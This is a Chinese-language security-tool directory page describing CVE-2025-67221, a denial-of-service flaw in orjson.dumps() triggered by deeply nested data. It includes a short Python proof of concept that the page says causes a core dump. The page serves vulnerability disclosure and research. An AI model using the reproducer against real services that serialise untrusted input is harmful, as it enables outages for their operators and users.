Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-67221 — CVE-2025-67221 的文档和复现代码,该漏洞是 orjson 的 dumps() 函数中的一个拒绝服务漏洞,由序列化深度嵌套的 JSON 数据时不受控制的递归引起。 | Kitploit
工具/GitHubGitHub/kpatsakis/cve-2025-67221
漏洞分析代码分析论文与研究学习与教育
GitHubkpatsakis/cve-2025-67221

CVE-2025-67221

CVE-2025-67221 的文档和复现代码,该漏洞是 orjson 的 dumps() 函数中的一个拒绝服务漏洞,由序列化深度嵌套的 JSON 数据时不受控制的递归引起。

查看仓库
1127个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-67221

漏洞摘要

字段值
CVE IDCVE-2025-67221
受影响的软件orjson
受影响版本≤ 3.11.4
漏洞类型拒绝服务(未控制递归)
攻击向量远程(如果攻击者控制序列化数据)

描述

在orjson 3.11.4及更早版本的orjson.dumps()函数中存在一个拒绝服务漏洞。该函数在序列化深度嵌套的JSON数据结构时未实施递归限制。攻击者若能使应用程序序列化由攻击者控制的嵌套数据,则可触发序列化过程中的崩溃。

受影响的函数

  • 函数: orjson.dumps()
  • 文件: pysrc/orjson/__init__.pyi

测试

测试于:

  • Python 3.12.3/3.11.2/3.12.3/3.13.9/3.14.0,Ubuntu Linux 内核 6.8.0-88
  • Python 3.13.3,Microsoft Windows 11 Education 10.0.26200 Build 26200

影响

使用orjson序列化不可信或攻击者控制的数据结构的应用程序可能容易遭受拒绝服务攻击。

复现代码

在本地复现漏洞的代码:

root@kitploit:~
import orjson
import sys
import platform
print(f'OS: {platform.platform()}') 
print(f'Python version: {sys. version}') 
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
    nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)

##演示 上述代码会导致一个完整的核心转储 演示

作者 / 研究人员

  • Constantinos Patsakis,希腊比雷埃夫斯大学信息学系
  • Evgenios Gkritsis,希腊雅典经济与商业大学信息学系
  • George Stergiopoulos,希腊雅典经济与商业大学信息学系

参考

  • https://github.com/ijl/orjson (受影响的项目)
下载工具